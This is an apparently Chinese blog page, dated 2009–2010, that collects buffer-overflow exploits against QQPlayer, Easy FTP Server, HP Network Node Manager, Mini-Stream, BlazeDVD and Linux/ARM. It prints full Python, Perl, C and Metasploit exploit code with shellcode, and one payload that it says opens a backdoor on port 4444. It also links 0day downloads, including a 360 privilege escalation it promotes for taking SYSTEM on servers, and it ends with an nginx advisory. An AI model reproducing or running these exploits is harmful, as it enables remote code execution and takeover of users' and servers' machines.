SpookZanG » 溢出

QQPlayer cue 文件缓冲区溢出漏洞

admin — Tue, 27 Jul 2010 15:28:29 +0000

QQPlayer cue 文件缓冲区溢出漏洞

 
#!/usr/bin/env python
 
#################################################################
#
# Title: QQPlayer cue File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :
 
head = '''FILE "'''
junk = "A" * 780
nseh ="\x42\x61\x21\x61"
seh  ="\xa9\x9e\x41\x00"
adjust="\x32\x42\x61\x33\xca\x83\xc0\x10"
shellcode=("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o"
           "0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41"
           "H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK"
           "NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01")
junk_="R"*8000
foot ='''.avi" VIDEO'''+"\x0a"'''TRACK 02 MODE1/8888'''+"\x0a"+"INDEX 08 08:08:08"
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
 
fobj = open("poc.cue","w")
fobj.write(payload)
fobj.close()

Easy FTP Server v1.7.0.11 远程缓冲区溢出漏洞

admin — Mon, 19 Jul 2010 08:48:03 +0000

Easy FTP Server v1.7.0.11 远程缓冲区溢出漏洞，以及0day程序。

漏洞利用程序下载

# Exploit Title: Easy FTP Server v1.7.0.11 CWD Command Remote Buffer Overflow Exploit (Post Auth)
# Date: 2010-07-18
# Author: fdisk
# Software Link:
# Version: 1.7.0.11
# Tested on: Windows XP SP3 en
# CVE:
 
import socket
import sys
 
buffersize = 268
 
# windows/exec - 227 bytes x86/shikata_ga_nai EXITFUNC=process, CMD=calc.exe
shellcode = ("\xb8\xf1\x18\xc7\x71\xd9\xc7\x29\xc9\xb1\x33\xd9\x74\x24\xf4"
"\x5b\x31\x43\x12\x83\xeb\xfc\x03\xb2\x16\x25\x84\xc8\xcf\x20"
"\x67\x30\x10\x53\xe1\xd5\x21\x41\x95\x9e\x10\x55\xdd\xf2\x98"
"\x1e\xb3\xe6\x2b\x52\x1c\x09\x9b\xd9\x7a\x24\x1c\xec\x42\xea"
"\xde\x6e\x3f\xf0\x32\x51\x7e\x3b\x47\x90\x47\x21\xa8\xc0\x10"
"\x2e\x1b\xf5\x15\x72\xa0\xf4\xf9\xf9\x98\x8e\x7c\x3d\x6c\x25"
"\x7e\x6d\xdd\x32\xc8\x95\x55\x1c\xe9\xa4\xba\x7e\xd5\xef\xb7"
"\xb5\xad\xee\x11\x84\x4e\xc1\x5d\x4b\x71\xee\x53\x95\xb5\xc8"
"\x8b\xe0\xcd\x2b\x31\xf3\x15\x56\xed\x76\x88\xf0\x66\x20\x68"
"\x01\xaa\xb7\xfb\x0d\x07\xb3\xa4\x11\x96\x10\xdf\x2d\x13\x97"
"\x30\xa4\x67\xbc\x94\xed\x3c\xdd\x8d\x4b\x92\xe2\xce\x33\x4b"
"\x47\x84\xd1\x98\xf1\xc7\xbf\x5f\x73\x72\x86\x60\x8b\x7d\xa8"
"\x08\xba\xf6\x27\x4e\x43\xdd\x0c\xa0\x09\x7c\x24\x29\xd4\x14"
"\x75\x34\xe7\xc2\xb9\x41\x64\xe7\x41\xb6\x74\x82\x44\xf2\x32"
"\x7e\x34\x6b\xd7\x80\xeb\x8c\xf2\xe2\x6a\x1f\x9e\xca\x09\xa7"
"\x05\x13")
 
eip = "\x91\xC8\x41\x7E" # CALL EDI - user32.dll
nopsled = "\x90" * 16
 
payload = "\x90" * (buffersize-(len(nopsled)+len(shellcode)))
 
def ExploitEasyFTP(target):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect = s.connect((target, 21))
    s.recv(1024)
    s.send('User anonymous\r\n')
    s.recv(1024)
    s.send('PASS anonymous\r\n')
    s.send('CWD '+nopsled+shellcode+payload+eip+'\r\n')
    s.recv(1024)
    s.send('QUIT ftp\r\n')
    s.close()
 
target = sys.argv[1]
 
ExploitEasyFTP(target)

惠普 Network Node Manager 7.53 缓冲区溢出漏洞+0day

admin — Fri, 16 Jul 2010 04:20:19 +0000

HP Network Node Manager (NNM) 7.53缓冲区溢出漏洞+0day。

如图运行下面语句即可打开一个端口为4444的后门。

C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TU\AAAAAAAAAAAAAAAAAAAAAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPNiJEP1KbQtLKPRFPLKF2DLNkF2EDNkD2ExFoMgPJDfDqIoEaIPNLElPaQlFbDlGPJaHODMFaIWKRL0QBF7LKBrFpLKQRElFaJpNkQPD8OuIPCDCzEQHPF0LKQXGhNkBxEpEQHSKSElQYLKDtLKFaKfP1KOP1KpLlIQJoDMGqO7DxM0BUJTFcCMIhGKQmQ4CEKRBxLKBxQ4FaN3E6NkDLPKLKBxELEQJsLKC4NkC1HPMYG4GTQ4QKQKCQPYQJCaKOIpBxQOCjLKDRHkMVCmE8GCFRGpC0E8BWCCP2CoPTPhPLQgFFDGIoJuOHNpEQGpGpQ9HDPTBpBHFIMPPkGpIoKePPPPPPBpG0F0G0F0QxJJDOKoM0KOHULIO7DqIKQCE8C2GpFqQLK9HfPjDPCfCgPhIRIKEgE7KOIEBsBwBHH7KYDxKOIoJuQCCcF7PhQdJLEkKQKON5QGOyIWE8QeBNPMQqKON5BHQsBME4C0NiJCBwBwQGP1L6PjGbPYCfKRImBFO7G4FDGLC1FaNmPDGTFpKvGpG4QDPPCfQFF6CvBvBnBvF6QCQFBHQiJlEoNfKOJuK9IpBnF6CvIoP0BHDHOwGmCPKOHUMkJPH5MrF6BHMvJ5MmOmKOJuElDFCLFjOpKKM0BUEUOKG7GcQbBOCZC0CcKON5DJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC

Excel 0x5D 记录缓冲区溢出0day程序

admin — Thu, 15 Jul 2010 05:35:43 +0000

Excel 0x5D 记录缓冲区溢出漏洞！受影响的版本是Office 2007.
点击下载利用程序

Real Player 12.0.0.879 Windows Xp 0day

admin — Fri, 09 Jul 2010 06:57:11 +0000

这个漏洞是利用了Windows Xp的RCE漏洞。从而使得安装过Real Player 的用户能在播放的时候，触发漏洞，从而执行黑客所想执行那个的程序。（如图）

漏洞利用程序下载：rp-0day
解压密码为:1

Mini-Stream RM-Mp3 转换器 v3.1.2.1 缓冲区溢出漏洞

admin — Fri, 02 Jul 2010 01:54:06 +0000

Mini-Stream是CD抓轨到mp3、wav、rm或wma格式；支持wav、mp3、rm、rmvb、ra、ram、rmj、wma、wmv、asx、asf媒体文件转换到wav、mp3、rm、wma音频文件；支持不同转换速率的设置；支持一个媒体文件同时转换到wav、mp3、rm、wma四个音频文件；十分简单易用。

但是其RM转MP3的程序出现了缓冲区溢出漏洞.

点击下载利用代码

#By Madjix Dz8[at]hotmail[dot]com
#Greets: myself for find the bug :)
#
# Notes from EDB:
# 000DBF98 41414141 AAAA
# 000DBF9C 41414141 AAAA
# 000DBFA0 41414141 AAAA
# 000DBFA4 41414141 AAAA Pointer to next SEH record
# 000DBFA8 41414141 AAAA SE handler
# 000DBFAC FFFFFFFF ÿÿÿÿ
# 000DBFB0 7C87F317 ó‡| kernel32.7C87F317
# 000DBFB4 90909090 
# 000DBFB8 90909090 
# 000DBFBC 90909090
#
my $shellcode= "\xdb\xc0\x31\xc9\xbf\x7c\x16\
x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
my $jnk="\x41" x 43488 ;
my $nseh="\xeb\x06\x90\x90" ;
my $seh="\x17\xF3\x87\x7C" ;
my $nops = "\x90" x 24 ;
 
open(MYFILE,'>>MadjiX.m3u');
print MYFILE $jnk.$nseh.$seh.$nops.$shellcode;
close(MYFILE);

Linux/ARM 禁用”ASLR安全”的代码

admin — Thu, 01 Jul 2010 02:45:53 +0000

Address space layout randomization【ASLR】是防止缓冲区溢出的技术，通过对栈、共享库映射等线性区布局的随机化，防止攻击者定位攻击代码位置，达到阻止溢出攻击的目的。据研究表明ASLR可以有效的降低缓冲区溢出攻击的成功率，如今Linux、FreeBSD、Windows等主流操作系统都已采用了该技术。

代码下载

/*
Title:  Linux/ARM - Disable ASLR Security - 102 bytes
Date:   2010-06-20
Tested: Linux ARM9 2.6.28-6-versatile
 
Author: Jonathan Salwan
Web:    http://shell-storm.org | http://twitter.com/shell_storm
 
! Database of shellcodes http://www.shell-storm.org/shellcode/
 
 
Description:
============
 Address space layout randomization (ASLR) is a computer security technique
 which involves randomly arranging the positions of key data areas, usually
 including the base  of the executable and position of libraries, heap, and
 stack, in a process's address space.
 
 This shellcode disables the ASLR on linux/ARM
 
*/
 
#include 
 
char *SC = "\x01\x30\x8f\xe2"  // add    r3, pc, #1
           "\x13\xff\x2f\xe1"  // bx     r3
           "\x24\x1b"          // subs   r4, r4, r4
           "\x20\x1c"          // adds   r0, r4, #0
           "\x17\x27"          // movs   r7, #23
           "\x01\xdf"          // svc    1
           "\x78\x46"          // mov    r0, pc
           "\x2e\x30"          // adds   r0, #46
           "\xc8\x21"          // movs   r1, #200
           "\xc8\x31"          // adds   r1, #200
           "\xc8\x31"          // adds   r1, #200
           "\xc8\x31"          // adds   r1, #200
           "\xc8\x31"          // adds   r1, #200
           "\x59\x31"          // adds   r1, #89
           "\xc8\x22"          // movs   r2, #200
           "\xc8\x32"          // adds   r2, #200
           "\x14\x32"          // adds   r2, #20
           "\x05\x27"          // movs   r7, #5
           "\x01\xdf"          // svc    1
           "\x03\x20"          // movs   r0, #3
           "\x79\x46"          // mov    r1, pc
           "\x0e\x31"          // adds   r1, #14
           "\x02\x22"          // movs   r2, #2
           "\x04\x27"          // movs   r7, #4
           "\x01\xdf"          // svc    1
           "\x92\x1a"          // subs   r2, r2, r2
           "\x10\x1c"          // adds   r0, r2, #0
           "\x01\x27"          // movs   r7, #1
           "\x01\xdf"          // svc    1
 
           "\x30\x0a"          // ^
           "\x2d\x2d"          // |
           "\x2f\x2f"          // |
           "\x70\x72"          // |
           "\x6f\x63"          // |
           "\x2f\x73"          // |
           "\x79\x73"          // |
           "\x2f\x6b"          // |
           "\x65\x72"          // |
           "\x6e\x65"          // |  [ strings ]
           "\x6c\x2f"          // |
           "\x72\x61"          // |
           "\x6e\x64"          // |
           "\x6f\x6d"          // |
           "\x69\x7a"          // |
           "\x65\x5f"          // |
           "\x76\x61"          // |
           "\x5f\x73"          // |
           "\x70\x61"          // |
           "\x63\x65";         // v
 
 
int main(void)
{
        fprintf(stdout,"Length: %d\n",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}

BlazeDVD v6.0缓冲区溢出漏洞

admin — Sun, 27 Jun 2010 15:50:18 +0000

作者:Blake

BlazeDVD出现了缓冲区溢出漏洞，让我们看看它的问题以及漏洞利用程序。

点击下载利用程序

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
 
include Msf::Exploit::FILEFORMAT
 
def initialize(info = {})
super(update_info(info,
'Name' => 'BlazeDVD 6.0 PLF Buffer Overflow',
'Description' => %q{
This module exploits a stack over flow in BlazeDVD 6.0.
When
the application is used to open a specially crafted plf
file,
a buffer is overwritten allowing for the execution of
arbitrary code.
Set the EXITFUNC to seh or thread for best results.
},
'License' => MSF_LICENSE,
'Author' => [ 'Blake' ],
'Version' => '$Revision 1$',
'References' =>
[
[ 'EDB-ID' , '13998' ],
[ 'BID', '35918' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1363,
'BadChars' => "\x00\x0a\x0d",
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'BlazeDVD 6.0 Universal', { 'Ret' => 0x6033077D } ],
],
'Privileged' => false,
'DisclosureDate' => 'June 23, 2010',
'DefaultTarget' => 0))
 
register_options(
[
OptString.new('FILENAME', [ false,
'The file name.', 'msf.plf']),
], self.class)
 
end
 
def exploit
 
plf = rand_text_alphanumeric(608)
plf << "\xeb\x06\x90\x90"
plf << [target.ret].pack('V')
plf << make_nops(20)
plf << payload.encoded
plf << rand_text_alphanumeric(1364 - payload.encoded.length)
 
print_status("Creating '#{datastore['FILENAME']}' file ...")
 
file_create(plf)
 
end
 
end

360又出漏洞—本地提权利用程序(0day)

admin — Tue, 02 Feb 2010 14:19:17 +0000

来源:t00ls.net 作者:friddy

前几天是RiSing的本地提权漏洞，这回是360本地提权漏洞.

各位服务器管理员朋友们小心了，这个漏洞我试验了，很好很强大，user权限运行一下，直接获得System的权限，而且是0DAY，官方现在未出补丁。

很Cool….

各位注意把………..

在服务器上，上传这个，shell下运行一下，然后3389登录，5下shift，system权限到手.

360漏洞利用程序下载

nginx HTTP请求远程缓冲区溢出漏洞

admin — Wed, 23 Sep 2009 07:21:50 +0000

影响版本:
Igor Sysoev nginx 0.8.14
Igor Sysoev nginx 0.7.61
Igor Sysoev nginx 0.6.38
Igor Sysoev nginx 0.5.37漏洞描述:
Bugraq ID: 36384
CVE ID：CVE-2009-2629

nginx是一款高性能的HTTP 和反向代理服务器。
nginx处理特殊构建的URIs存在缓冲区溢出，远程攻击者可以利用漏洞以应用程序程序执行任意指令。
当处理特殊构建的URIs时ngx_http_parse_complex_uri()函数存在缓冲区下溢错误，可导致nginx服务器把URI中的数据在分配缓冲区前就写入到堆内存中，可导致以服务进程权限执行任意指令。<*参考

http://www.kb.cert.org/vuls/id/180065

*>
SEBUG安全建议:
厂商解决方案
Debian linux用户可升级到如下版本：
Debian Linux 4.0 ia-32
Debian nginx_0.4.13-2+etch2_i386.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_i386.deb

Debian Linux 5.0 hppa
Debian nginx_0.6.32-3+lenny2_hppa.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_hppa.deb

Debian Linux 5.0 ia-64
Debian nginx_0.6.32-3+lenny2_ia64.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_ia64.deb

Debian Linux 4.0 hppa
Debian nginx_0.4.13-2+etch2_hppa.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_hppa.deb

Debian Linux 4.0 sparc
Debian nginx_0.4.13-2+etch2_sparc.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_sparc.deb

Debian Linux 4.0 s/390
Debian nginx_0.4.13-2+etch2_s390.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_s390.deb

Debian Linux 5.0 arm
Debian nginx_0.6.32-3+lenny2_arm.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_arm.deb

Debian Linux 4.0 powerpc
Debian nginx_0.4.13-2+etch2_powerpc.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_powerpc.deb

Debian Linux 4.0 mipsel
Debian nginx_0.4.13-2+etch2_mipsel.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_mipsel.deb

Debian Linux 5.0 alpha
Debian nginx_0.6.32-3+lenny2_alpha.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_alpha.deb

Debian Linux 5.0 amd64
Debian nginx_0.6.32-3+lenny2_amd64.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_amd64.deb

Debian Linux 5.0 ia-32
Debian nginx_0.6.32-3+lenny2_i386.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_i386.deb

Debian Linux 5.0 mips
Debian nginx_0.6.32-3+lenny2_mips.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_mips.deb

Debian Linux 5.0 mipsel
Debian nginx_0.6.32-3+lenny2_mipsel.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_mipsel.deb

Debian Linux 5.0 powerpc
Debian nginx_0.6.32-3+lenny2_powerpc.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_powerpc.deb

Debian Linux 4.0 ia-64
Debian nginx_0.4.13-2+etch2_ia64.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_ia64.deb

Debian Linux 4.0 mips
Debian nginx_0.4.13-2+etch2_mips.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.4.13-2+et ch2_mips.deb

Debian Linux 5.0 sparc
Debian nginx_0.6.32-3+lenny2_sparc.deb

http://security.debian.org/pool/updates/main/n/nginx/nginx_0.6.32-3+le nny2_sparc.deb